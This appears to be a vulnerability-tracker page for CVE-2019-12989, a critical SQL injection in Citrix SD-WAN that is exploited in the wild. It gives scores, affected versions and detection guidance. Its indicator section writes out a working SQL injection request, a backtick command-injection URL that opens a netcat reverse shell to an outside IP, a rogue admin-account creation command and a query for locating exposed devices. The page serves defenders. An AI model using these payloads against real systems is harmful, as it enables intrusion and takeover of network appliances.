cbcvebase.
CVE-2019-12989
published 2019-07-16

CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.

PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
94.05%
99.8th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.

Affected

6 ranges
VendorProductVersion rangeFixed in
citrixcitrix_sd-wan
citrixnetscaler_adc_gateway
citrixnetscaler_sd-wan>= 10.0.0 < 10.0.810.0.8
citrixsd-wan
citrixsd-wan>= 10.2.0 < 10.2.310.2.3
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

url/sdwan/nitro/v1/config/get_package_file?action=file_download
path/cgi-bin/sdwanrestapi/getpackagefile.cgi
path/tmp/token_01234
url/cgi-bin/vwdash.cgi?swc-token=01234
url/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
commandsudo nc -nv %s %d -e /bin/bash
commandperl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1
otherfofa-query: (title="citrix sd-wan") && icon_hash="177980953"
sigma
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
SSL_CLIENT_VERIFY: SUCCESS

{"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}
  • Look for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the custom header SSL_CLIENT_VERIFY: SUCCESS — this header is required to trigger the unauthenticated SQL injection.
  • Detect SQL UNION-based injection payloads in the 'site_name' JSON field of POST requests to the get_package_file endpoint, particularly payloads containing INTO OUTFILE targeting /tmp/.
  • Monitor for file creation in /tmp/ matching the pattern token_[0-9]+ by the 'mysql' user, which indicates successful SQL injection auth bypass.
  • Detect GET requests to /cgi-bin/installpatch.cgi with backtick-enclosed commands in the 'installfile' parameter, indicating chained command injection (CVE-2019-12991) following auth bypass.
  • A 400 HTTP response containing both 'status:"fail"' and 'Invalid value specified' from the get_package_file endpoint is the expected server response confirming successful SQL injection trigger.
  • Monitor for execution of nc (netcat) with '-e /bin/bash' arguments spawned from the web server process, indicating reverse shell establishment post-exploitation.
  • Alert on execution of user_management.pl with 'addUser' arguments from non-administrative contexts, indicating post-exploitation persistence via rogue admin account creation.
  • ·The SQL injection is only reachable when the HTTP header SSL_CLIENT_VERIFY is set to SUCCESS. In production deployments with a properly configured TLS terminating proxy, this header may be restricted — however, if the appliance is directly internet-exposed, no such protection exists.
  • ·The Nuclei detection template uses a DSL matcher that checks for both the error response body ('status:"fail"', 'Invalid value specified') AND the md5 hash of a random number in the body — the second condition confirms blind data exfiltration via error messages.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.